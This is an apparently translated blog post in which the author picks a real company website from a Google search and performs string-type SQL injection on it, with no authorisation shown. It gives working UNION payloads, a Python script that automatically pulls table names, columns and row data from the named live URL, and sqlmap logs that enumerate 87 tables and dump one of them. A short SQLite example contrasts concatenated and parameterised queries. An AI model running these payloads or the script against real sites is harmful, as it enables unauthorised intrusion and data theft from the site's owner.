String-type SQL injection

Posted by Zss:

1. I wanted to find a website to test SQL injection against, and a Google search did turn some up. The test site is http://www.calin.com.tw/ab.php?id=1&item_id=33

First a routine test: append a ' to the parameter. Not only does the page error out, it also prints the failing SQL statement in full. Lucky.

Can't execute query

SELECT * FROM about_content_tw WHERE available='1' and id = '33''

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''33''' at line 1

This script cannot continue, terminating.

2. The error shows this is a string-type injection (the value is wrapped in single quotes). Trying to find the table's total column count with order by,

the site returned normally for every value, so order by cannot be used to determine the column count here; instead the count is guessed directly with union.

3. Testing with ' and 1=2 union select 1,2,3,USER(),DATABASE(),VERSION() or '1'='1 produces "This script cannot continue, terminating.", which means the column count is wrong.

Adding one more column at a time, 7 columns gives no error, so the table has 7 columns in total, and the statement becomes

' and 1=2 union select 1,2,3,USER(),DATABASE(),VERSION(),7 or '1'='1

This now returns normally: the database is dbcalin and the current user is dbcalin@localhost
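The behaviour probed in steps 1 to 3, reproduced offline as an added example that is not part of the original post: a constructed SQLite table standing in for about_content_tw (7 columns, as established above), a lookup that builds the query by string concatenation, and the same lookup with a bound parameter. The table contents, function names and the two payload constants are assumptions. A bare quote and a UNION with the wrong column count both raise a database error, which is what the site reported as "This script cannot continue"; a 7-column UNION returns the injected row (with the server version where the page's VERSION() probe lands), while the parameterised version treats the whole payload as a literal id and returns nothing.

```python
import sqlite3

# Constructed stand-in for the page's about_content_tw table (7 columns, as the
# write-up determined). Added example, not the site's code; names are assumptions.
SCHEMA = """
CREATE TABLE about_content_tw (
    id INTEGER, available TEXT, title TEXT, content TEXT,
    lang TEXT, sort_order INTEGER, created TEXT
);
INSERT INTO about_content_tw VALUES
    (33, '1', 'About us', 'Company profile', 'tw', 1, '2012-10-29'),
    (34, '0', 'Draft', 'Not yet published', 'tw', 2, '2012-10-30');
"""


def make_db():
    """Create the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def db_version(conn):
    """Server version string, the value the page's VERSION() probe extracts."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


def lookup_vulnerable(conn, item_id):
    """The pattern behind the quoted error: the request value is pasted into the SQL text."""
    sql = "SELECT * FROM about_content_tw WHERE available='1' and id = '%s'" % item_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, item_id):
    """Same query with a bound parameter: quotes, UNION and comment markers stay data."""
    sql = "SELECT * FROM about_content_tw WHERE available='1' and id = ?"
    return conn.execute(sql, (item_id,)).fetchall()


def probe(conn, lookup, item_id):
    """Run one lookup and report ('ok', rows) or ('error', message)."""
    try:
        return "ok", lookup(conn, item_id)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


# Constructed payloads mirroring step 3: wrong column count, then the right one.
UNION_4_COLS = "33' and 1=2 union select 1,2,3,sqlite_version() or '1'='1"
UNION_7_COLS = "33' and 1=2 union select 1,2,3,sqlite_version(),5,6,7 or '1'='1"


if __name__ == "__main__":
    conn = make_db()
    cases = [("normal", "33"), ("bare quote", "33'"),
             ("4-column UNION", UNION_4_COLS), ("7-column UNION", UNION_7_COLS)]
    for label, value in cases:
        print("concatenated  / %-14s -> %s" % (label, probe(conn, lookup_vulnerable, value)))
        print("parameterised / %-14s -> %s" % (label, probe(conn, lookup_safe, value)))
```

The error text for the 4-column case is the database's own complaint that the two SELECTs have different column counts; the site's generic "cannot continue" message hid that wording but still leaked the fact that an error occurred, which is all the column-count guessing in step 3 needs. Binding the parameter removes the whole class of behaviour rather than any single payload.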

 

4. Next, query table names. Since limit is needed to control which row is returned, -- ss is used to comment out the trailing ' that the application appends.

' and 1=2 union select 1,2,3,4,TABLE_NAME,6,7 from information_schema.TABLES where TABLE_SCHEMA='dbcalin' limit 0,1 -- ss

Changing the limit offset returns a different table name each time. There are too many to do by hand, so later a script does it.

5. Then the columns: change the table name in the statement below to query a different table and the limit offset to return a different column; this too is automated with the script.

' and 1=2 union select 1,2,3,4,column_name,6,7 from information_schema.COLUMNs where TABLE_SCHEMA='dbcalin' and table_name='about_content_eng' limit 0,1 -- ss

6. Then the row contents

' and 1=2 union select 1,2,3,title,content,6,7 from dbcalin.about_content_eng LIMIT 0,1 -- ss

7. Afterwards I wrote a script to build these injection URLs automatically and print the values of every column of these tables. The site does not seem to have an admin backend, though; it could be in another database, but that would be unusual, so presumably there simply is no backend.

#coding:utf-8

from lxml import etree
import requests

# Results collected by the functions below (filled in under __main__)
tables_list = []
colums_list = []


def first_text(xml):
    # The injected value is rendered inside this element of the page; return it
    # stripped, or '' when the element is absent or empty (end of the list)
    nodes = xml.xpath('//*[@id="h6"]/div[2]/div[3]/text()')
    return nodes[0].strip('\n').strip('\t').strip() if nodes else ''


def tables(db_name):
    i = 0
    print('-' * 10 + '   正在获取%s数据库中的表...   ' % db_name + '-' * 10)
    while 1:
        url = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,TABLE_NAME,6,7 from information_schema.TABLES where TABLE_SCHEMA='%s' limit %d,1 -- ss""" % (db_name, i)
        rsp = requests.get(url).content
        table = first_text(etree.HTML(rsp))
        i += 1
        if len(table) == 0:
            break
        else:
            print('数据库:%s  第%d张表:%s' % (db_name, i, table))
            tables_list.append((db_name, table))
    print('-' * 10 + '   获取完成!!!  %s数据库总共%d张表!!!   ' % (db_name, len(tables_list)) + '-' * 10 + '\n')
    return tables_list


def columns(db_tb_name):
    i = 0
    print('-' * 10 + '   正在获取%s数据库中%s表的所有字段...   ' % (db_tb_name[0], db_tb_name[1]) + '-' * 10)
    while 1:
        url = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,column_name,6,7 from information_schema.COLUMNs where TABLE_SCHEMA='%s' and table_name='%s' limit %d,1-- ss""" % (db_tb_name[0], db_tb_name[1], i)
        rsp = requests.get(url).content
        column = first_text(etree.HTML(rsp))
        i += 1
        if len(column) == 0:
            break
        else:
            print('数据库:%s  表:%s  第%d个字段:%s' % (db_tb_name[0], db_tb_name[1], i, column))
            colums_list.append((db_tb_name[0], db_tb_name[1], column))
    # i - 1 is the number of columns found for this table (the original printed len(tables_list) here)
    print('-' * 10 + '   获取完成!!!  %s数据库总共%s表总共%d个字段!!!   ' % (db_tb_name[0], db_tb_name[1], i - 1) + '-' * 10 + '\n')
    return colums_list


def value(db_tb_cl_name):
    # First find out how many rows the table has
    url1 = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,count(*),6,7 from %s.%s LIMIT 0,1 -- ss""" % (db_tb_cl_name[0], db_tb_cl_name[1])
    rsp1 = requests.get(url1).content
    values1 = int(first_text(etree.HTML(rsp1)))

    # Then fetch the column one row at a time; the loop variable already advances,
    # so the original's "i =+ 1" no-op has been dropped
    for i in range(values1):
        url = """http://www.calin.com.tw/ab.php?id=1&item_id=33' and 1=2 union select 1,2,3,4,%s,6,7 from %s.%s LIMIT %d,1 -- ss""" % (db_tb_cl_name[2], db_tb_cl_name[0], db_tb_cl_name[1], i)
        rsp = requests.get(url).content
        values = first_text(etree.HTML(rsp))
        if len(values) == 0:
            break
        else:
            print('%s表 %s字段的值:%s' % (db_tb_cl_name[1], db_tb_cl_name[2], values))


if __name__ == '__main__':
    # tables_list = tables('dbcalin')
    tables_list = [('dbcalin', 'financial_sales_tw'), ('dbcalin', 'financial_sales_eng')]
    for table in tables_list:
        columns(table)
    for column in colums_list:
        value(column)

8. I also ran sqlmap against it and the results matched my manual injection. The URL was changed to http://www.calin.com.tw/ab.php?item_id=33, with only the one parameter.

root@MiWiFi-R3L-srv:~# sqlmap -u 
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:37:44 /2019-05-31/

[17:37:46] [INFO] testing connection to the target URL
[17:37:46] [INFO] testing if the target URL content is stable
[17:37:47] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[17:37:49] [INFO] testing if GET parameter 'item_id' is dynamic
[17:37:49] [WARNING] GET parameter 'item_id' does not appear to be dynamic
[17:37:54] [INFO] heuristics detected web page charset 'ascii'
[17:37:54] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'MySQL')
[17:37:54] [INFO] heuristic (XSS) test shows that GET parameter 'item_id' might be vulnerable to cross-site scripting (XSS) attacks
[17:37:54] [INFO] testing for SQL injection on GET parameter 'item_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:38:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:38:01] [WARNING] reflective value(s) found and filtering out
[17:38:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:38:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:38:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[17:38:10] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[17:38:15] [INFO] GET parameter 'item_id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[17:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:38:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:38:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:38:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:38:15] [INFO] GET parameter 'item_id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[17:38:15] [INFO] testing 'MySQL inline queries'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:38:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:38:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:38:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[17:38:16] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[17:39:16] [INFO] GET parameter 'item_id' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable
[17:39:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:39:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:39:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:39:17] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:39:18] [INFO] target URL appears to have 7 columns in query
[17:39:20] [INFO] target URL appears to be UNION injectable with 7 columns
[17:39:20] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[17:39:20] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 196 HTTP(s) requests:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:41:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:41:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:41:36 /2019-05-31/

root@MiWiFi-R3L-srv:~# sqlmap -u http://www.calin.com.tw/ab.php?item_id=33 --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:41:52 /2019-05-31/

[17:41:53] [INFO] resuming back-end DBMS 'mysql'
[17:41:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:41:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:41:53] [INFO] fetching database names
[17:41:53] [INFO] used SQL query returns 2 entries
[17:41:53] [INFO] retrieved: 'information_schema'
[17:41:54] [INFO] retrieved: 'dbcalin'
available databases [2]:
[*] dbcalin
[*] information_schema

[17:41:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:41:54 /2019-05-31/

root@MiWiFi-R3L-srv:~# sqlmap -u http://www.calin.com.tw/ab.php?item_id=33 -D "dbcalin" --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:42:15 /2019-05-31/

[17:42:16] [INFO] resuming back-end DBMS 'mysql'
[17:42:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:42:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:42:16] [INFO] fetching tables for database: 'dbcalin'
[17:42:16] [INFO] used SQL query returns 87 entries
[17:42:16] [INFO] retrieved: 'about_content_eng'
[17:42:16] [INFO] retrieved: 'about_content_jp'
[17:42:16] [INFO] retrieved: 'about_content_tw'
[17:42:16] [INFO] retrieved: 'about_us_eng'
[17:42:16] [INFO] retrieved: 'about_us_jp'
[17:42:16] [INFO] retrieved: 'about_us_tw'
[17:42:16] [INFO] retrieved: 'categories_eng'
[17:42:16] [INFO] retrieved: 'categories_jp'
[17:42:17] [INFO] retrieved: 'categories_tw'
[17:42:17] [INFO] retrieved: 'company_explain_eng'
[17:42:17] [INFO] retrieved: 'company_explain_jp'
[17:42:17] [INFO] retrieved: 'company_explain_tw'
[17:42:17] [INFO] retrieved: 'company_info_eng'
[17:42:17] [INFO] retrieved: 'company_info_jp'
[17:42:17] [INFO] retrieved: 'company_info_tw'
[17:42:17] [INFO] retrieved: 'contact_us_eng'
[17:42:17] [INFO] retrieved: 'contact_us_items_eng'
[17:42:17] [INFO] retrieved: 'contact_us_items_jp'
[17:42:17] [INFO] retrieved: 'contact_us_items_tw'
[17:42:17] [INFO] retrieved: 'contact_us_jp'
[17:42:17] [INFO] retrieved: 'contact_us_tw'
[17:42:18] [INFO] retrieved: 'country_actuarial_eng'
[17:42:18] [INFO] retrieved: 'country_actuarial_jp'
[17:42:18] [INFO] retrieved: 'country_actuarial_tw'
[17:42:18] [INFO] retrieved: 'financial_event_eng'
[17:42:18] [INFO] retrieved: 'financial_event_jp'
[17:42:18] [INFO] retrieved: 'financial_event_tw'
[17:42:18] [INFO] retrieved: 'financial_explain_eng'
[17:42:18] [INFO] retrieved: 'financial_explain_jp'
[17:42:18] [INFO] retrieved: 'financial_explain_tw'
[17:42:18] [INFO] retrieved: 'financial_report_eng'
[17:42:18] [INFO] retrieved: 'financial_report_jp'
[17:42:19] [INFO] retrieved: 'financial_report_tw'
[17:42:19] [INFO] retrieved: 'financial_sales_eng'
[17:42:19] [INFO] retrieved: 'financial_sales_jp'
[17:42:19] [INFO] retrieved: 'financial_sales_tw'
[17:42:19] [INFO] retrieved: 'footer_info_eng'
[17:42:19] [INFO] retrieved: 'footer_info_jp'
[17:42:19] [INFO] retrieved: 'footer_info_tw'
[17:42:19] [INFO] retrieved: 'header_info_eng'
[17:42:19] [INFO] retrieved: 'header_info_jp'
[17:42:19] [INFO] retrieved: 'header_info_tw'
[17:42:19] [INFO] retrieved: 'login_log_eng'
[17:42:20] [INFO] retrieved: 'login_log_jp'
[17:42:20] [INFO] retrieved: 'login_log_tw'
[17:42:20] [INFO] retrieved: 'managers_eng'
[17:42:20] [INFO] retrieved: 'managers_jp'
[17:42:20] [INFO] retrieved: 'managers_tw'
[17:42:20] [INFO] retrieved: 'page_counter_eng'
[17:42:20] [INFO] retrieved: 'page_counter_jp'
[17:42:20] [INFO] retrieved: 'page_counter_tw'
[17:42:20] [INFO] retrieved: 'pro_views_eng'
[17:42:21] [INFO] retrieved: 'pro_views_jp'
[17:42:21] [INFO] retrieved: 'pro_views_tw'
[17:42:21] [INFO] retrieved: 'products_content_eng'
[17:42:21] [INFO] retrieved: 'products_content_jp'
[17:42:21] [INFO] retrieved: 'products_content_tw'
[17:42:21] [INFO] retrieved: 'products_eng'
[17:42:22] [INFO] retrieved: 'products_image_eng'
[17:42:22] [INFO] retrieved: 'products_image_jp'
[17:42:22] [INFO] retrieved: 'products_image_tw'
[17:42:22] [INFO] retrieved: 'products_jp'
[17:42:22] [INFO] retrieved: 'products_tw'
[17:42:22] [INFO] retrieved: 'referer_eng'
[17:42:22] [INFO] retrieved: 'referer_jp'
[17:42:22] [INFO] retrieved: 'referer_tw'
[17:42:22] [INFO] retrieved: 'shareholder_dividend_eng'
[17:42:22] [INFO] retrieved: 'shareholder_dividend_jp'
[17:42:23] [INFO] retrieved: 'shareholder_dividend_tw'
[17:42:23] [INFO] retrieved: 'shareholder_manual_eng'
[17:42:23] [INFO] retrieved: 'shareholder_manual_jp'
[17:42:23] [INFO] retrieved: 'shareholder_manual_tw'
[17:42:23] [INFO] retrieved: 'shareholder_meeting_eng'
[17:42:23] [INFO] retrieved: 'shareholder_meeting_jp'
[17:42:23] [INFO] retrieved: 'shareholder_meeting_tw'
[17:42:23] [INFO] retrieved: 'shareholder_notice_eng'
[17:42:23] [INFO] retrieved: 'shareholder_notice_jp'
[17:42:23] [INFO] retrieved: 'shareholder_notice_tw'
[17:42:23] [INFO] retrieved: 'shareholder_report_eng'
[17:42:23] [INFO] retrieved: 'shareholder_report_jp'
[17:42:23] [INFO] retrieved: 'shareholder_report_tw'
[17:42:24] [INFO] retrieved: 'shareholder_topten_eng'
[17:42:24] [INFO] retrieved: 'shareholder_topten_jp'
[17:42:24] [INFO] retrieved: 'shareholder_topten_tw'
[17:42:24] [INFO] retrieved: 'system_info_eng'
[17:42:24] [INFO] retrieved: 'system_info_jp'
[17:42:24] [INFO] retrieved: 'system_info_tw'
Database: dbcalin
[87 tables]
+--------------------------+
| about_content_eng        |
| about_content_jp         |
| about_content_tw         |
| about_us_eng             |
| about_us_jp              |
| about_us_tw              |
| categories_eng           |
| categories_jp            |
| categories_tw            |
| company_explain_eng      |
| company_explain_jp       |
| company_explain_tw       |
| company_info_eng         |
| company_info_jp          |
| company_info_tw          |
| contact_us_eng           |
| contact_us_items_eng     |
| contact_us_items_jp      |
| contact_us_items_tw      |
| contact_us_jp            |
| contact_us_tw            |
| country_actuarial_eng    |
| country_actuarial_jp     |
| country_actuarial_tw     |
| financial_event_eng      |
| financial_event_jp       |
| financial_event_tw       |
| financial_explain_eng    |
| financial_explain_jp     |
| financial_explain_tw     |
| financial_report_eng     |
| financial_report_jp      |
| financial_report_tw      |
| financial_sales_eng      |
| financial_sales_jp       |
| financial_sales_tw       |
| footer_info_eng          |
| footer_info_jp           |
| footer_info_tw           |
| header_info_eng          |
| header_info_jp           |
| header_info_tw           |
| login_log_eng            |
| login_log_jp             |
| login_log_tw             |
| managers_eng             |
| managers_jp              |
| managers_tw              |
| page_counter_eng         |
| page_counter_jp          |
| page_counter_tw          |
| pro_views_eng            |
| pro_views_jp             |
| pro_views_tw             |
| products_content_eng     |
| products_content_jp      |
| products_content_tw      |
| products_eng             |
| products_image_eng       |
| products_image_jp        |
| products_image_tw        |
| products_jp              |
| products_tw              |
| referer_eng              |
| referer_jp               |
| referer_tw               |
| shareholder_dividend_eng |
| shareholder_dividend_jp  |
| shareholder_dividend_tw  |
| shareholder_manual_eng   |
| shareholder_manual_jp    |
| shareholder_manual_tw    |
| shareholder_meeting_eng  |
| shareholder_meeting_jp   |
| shareholder_meeting_tw   |
| shareholder_notice_eng   |
| shareholder_notice_jp    |
| shareholder_notice_tw    |
| shareholder_report_eng   |
| shareholder_report_jp    |
| shareholder_report_tw    |
| shareholder_topten_eng   |
| shareholder_topten_jp    |
| shareholder_topten_tw    |
| system_info_eng          |
| system_info_jp           |
| system_info_tw           |
+--------------------------+

[17:42:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:42:24 /2019-05-31/

root@MiWiFi-R3L-srv:~# sqlmap -u http://www.calin.com.tw/ab.php?item_id=33 -D "dbcalin" -T "products_image_eng" --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:44:04 /2019-05-31/

[17:44:04] [INFO] resuming back-end DBMS 'mysql' 
[17:44:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: item_id=33' OR NOT 2767=2767#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: item_id=33' OR (SELECT 2845 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(2845=2845,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HDbI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: item_id=33' OR SLEEP(5)-- NkvG

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: item_id=33' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x736a4e6c6f56494b714a6d75554c7a687a72535a56754e46706e79475a5a575272596c6476447a57,0x7171766b71),NULL,NULL#
---
[17:44:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache, Plesk, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[17:44:05] [INFO] fetching columns for table 'products_image_eng' in database 'dbcalin'
[17:44:05] [INFO] used SQL query returns 7 entries
[17:44:05] [INFO] retrieved: 'id','int(11)'
[17:44:05] [INFO] retrieved: 'item_id','int(11)'
[17:44:05] [INFO] retrieved: 'title','varchar(100)'
[17:44:05] [INFO] retrieved: 'image','varchar(50)'
[17:44:05] [INFO] retrieved: 'tempSet','enum('0','1')'
[17:44:05] [INFO] retrieved: 'coverSet','enum('0','1')'
[17:44:05] [INFO] retrieved: 'createDate','datetime'
[17:44:05] [INFO] fetching entries for table 'products_image_eng' in database 'dbcalin'                                                            
[17:44:05] [INFO] used SQL query returns 7 entries
[17:44:05] [INFO] retrieved: '1','2012-10-29 15:40:49','1','1210298881.jpg','1','0',''
[17:44:05] [INFO] retrieved: '1','2012-10-29 16:21:19','2','1210295052.jpg','2','0',''
[17:44:05] [INFO] retrieved: '1','2012-10-29 16:22:22','3','1210297134.jpg','3','0',''
[17:44:05] [INFO] retrieved: '1','2012-10-29 16:22:56','4','1210291332.jpg','4','0',''
[17:44:05] [INFO] retrieved: '1','2016-12-22 13:36:43','7','1612226954.jpg','7','0',''
[17:44:06] [INFO] retrieved: '1','2019-03-25 13:28:09','8','1903256080.jpg','8','0',''
[17:44:06] [INFO] retrieved: '1','2019-03-25 13:36:05','9','1903258634.jpg','9','0',''
Database: dbcalin                                                                                                                                  
Table: products_image_eng
[7 entries]
+----+---------+---------+----------------+---------+----------+---------------------+
| id | item_id | title   | image          | tempSet | coverSet | createDate          |
+----+---------+---------+----------------+---------+----------+---------------------+
| 1  | 1       | <blank> | 1210298881.jpg | 0       | 1        | 2012-10-29 15:40:49 |
| 2  | 2       | <blank> | 1210295052.jpg | 0       | 1        | 2012-10-29 16:21:19 |
| 3  | 3       | <blank> | 1210297134.jpg | 0       | 1        | 2012-10-29 16:22:22 |
| 4  | 4       | <blank> | 1210291332.jpg | 0       | 1        | 2012-10-29 16:22:56 |
| 7  | 7       | <blank> | 1612226954.jpg | 0       | 1        | 2016-12-22 13:36:43 |
| 8  | 8       | <blank> | 1903256080.jpg | 0       | 1        | 2019-03-25 13:28:09 |
| 9  | 9       | <blank> | 1903258634.jpg | 0       | 1        | 2019-03-25 13:36:05 |
+----+---------+---------+----------------+---------+----------+---------------------+

[17:44:06] [INFO] table 'dbcalin.products_image_eng' dumped to CSV file '/root/.sqlmap/output/www.calin.com.tw/dump/dbcalin/products_image_eng.csv'
[17:44:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.calin.com.tw'

[*] ending @ 17:44:06 /2019-05-31/
